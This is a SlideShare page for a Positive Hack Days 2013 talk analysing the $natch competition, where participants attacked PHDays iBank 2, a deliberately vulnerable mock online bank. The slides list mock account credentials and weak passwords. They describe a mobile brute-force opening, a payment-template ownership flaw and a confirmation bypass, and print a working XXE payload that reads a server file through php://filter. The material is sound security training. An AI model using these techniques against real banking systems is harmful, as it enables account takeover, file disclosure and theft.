Successfully reported this slideshow.
$NATCHSergey Scherbel & Yuriy DyachenkoPositive TechnologiesPositive Hack Days 2013
Some BackgroundThe competition took place for the first time at PHDays 2012.$natch aims at demonstrating the typical vulne...
Last Year Results― 9 participants;― 4 winners;― the biggest winnings of 3,500roubles;― some winners got into the Positivec...
PHDays iBank 2PHDays iBank 2 is NOT a real online banking system used byactual banks.The system was developed exclusively ...
Competition Rules― 100 bank clients;― 10 participants;― 20,000 roubles of prize money;― 1 day for source code analysis;― 3...
At WorkshopYou will be able:― to examine each vulnerability in detail;― to exploit vulnerabilities “by hand”;― to exploit ...
Accounts100001:PKAC1y100002:RNrlO9100003:Ndl1Ix100004:hQPuJw100005:kpgtCI
AuthenticationOne should enter the CAPTCHA to sign in.
Mobile Bank AuthenticationNo CAPTCHA here, thus the account bruteforce is possible.
Accounts with Simple Passwords100011:password100012:phdays100013:qwerty100014:password100015:123456100016:12345100017:1111...
Transaction Confirmation
Confirmation Bypass in Mobile Bank
Payment Templates Modification
Payment Templates ModificationA template is not checked if it is owned by the current user
Payment Templates Modification$$
Payment Templates Modification$$
Importing ContactsMost online banks have a feature that allows one to import/exportdata.
XML External EntityLoading of external entities is not disabled.http://php.net/libxml_disable_entity_loader
XML External Entity<?xml version="1.0" encoding="utf-8"?><!DOCTYPE contact [<!ENTITY x SYSTEM "php://filter/read=convert.b...
XML External EntityFile contents in base64
Debug Mode
Thanks for your attention!Sergey Scherbelsscherbel@ptsecurity.ruYuriy Dyachenkoydyachenko@ptsecurity.ru
Upcoming SlideShare
Loading in …5
×

Sergey Scherbel, Yuriy Dyachenko. Analyzing $natch

903 views

Published on

Published in: Technology, Economy & Finance
  • Be the first to comment

Sergey Scherbel, Yuriy Dyachenko. Analyzing $natch

  1. 1. $NATCHSergey Scherbel & Yuriy DyachenkoPositive TechnologiesPositive Hack Days 2013
  2. 2. Some BackgroundThe competition took place for the first time at PHDays 2012.$natch aims at demonstrating the typical vulnerabilities ofonline banking systems.Positive Technologies performs security tests of online bankingsystems on a regular basis. We are really into it.The most interesting and dangerous vulnerabilities along withthe simply typical weaknesses are integrated into PHDaysiBank.
  3. 3. Last Year Results― 9 participants;― 4 winners;― the biggest winnings of 3,500roubles;― some winners got into the Positivecommunity ;(after an extremely scaryinterview of course).
  4. 4. PHDays iBank 2PHDays iBank 2 is NOT a real online banking system used byactual banks.The system was developed exclusively for the PHDays 2013competition.PHDays iBank 2 employs the typical vulnerabilities of onlinebanking systems.
  5. 5. Competition Rules― 100 bank clients;― 10 participants;― 20,000 roubles of prize money;― 1 day for source code analysis;― 30–40 minutes of the actual competition;― a participant will get as much money as he/she will manageto transfer to his/her account;― the participants can steal money from each other.
  6. 6. At WorkshopYou will be able:― to examine each vulnerability in detail;― to exploit vulnerabilities “by hand”;― to exploit vulnerabilities with various tools.Everything is performed on a special copy of the competitionsystem.
  7. 7. Accounts100001:PKAC1y100002:RNrlO9100003:Ndl1Ix100004:hQPuJw100005:kpgtCI
  8. 8. AuthenticationOne should enter the CAPTCHA to sign in.
  9. 9. Mobile Bank AuthenticationNo CAPTCHA here, thus the account bruteforce is possible.
  10. 10. Accounts with Simple Passwords100011:password100012:phdays100013:qwerty100014:password100015:123456100016:12345100017:11111100018:ninja100019:123123100020:sex100021:asdzxc100022:654321100023:iloveyou100024:root100025:master100026:superman...
  11. 11. Transaction Confirmation
  12. 12. Confirmation Bypass in Mobile Bank
  13. 13. Payment Templates Modification
  14. 14. Payment Templates ModificationA template is not checked if it is owned by the current user
  15. 15. Payment Templates Modification$$
  16. 16. Payment Templates Modification$$
  17. 17. Importing ContactsMost online banks have a feature that allows one to import/exportdata.
  18. 18. XML External EntityLoading of external entities is not disabled.http://php.net/libxml_disable_entity_loader
  19. 19. XML External Entity<?xml version="1.0" encoding="utf-8"?><!DOCTYPE contact [<!ENTITY x SYSTEM "php://filter/read=convert.base64-encode/resource=logs/changePassword.log">]><contacts><contact><name>name</name><account>90107430600712500003</account><description>&x;</description></contact></contacts>http://www.php.net/manual/en/wrappers.php.php
  20. 20. XML External EntityFile contents in base64
  21. 21. Debug Mode
  22. 22. Thanks for your attention!Sergey Scherbelsscherbel@ptsecurity.ruYuriy Dyachenkoydyachenko@ptsecurity.ru

×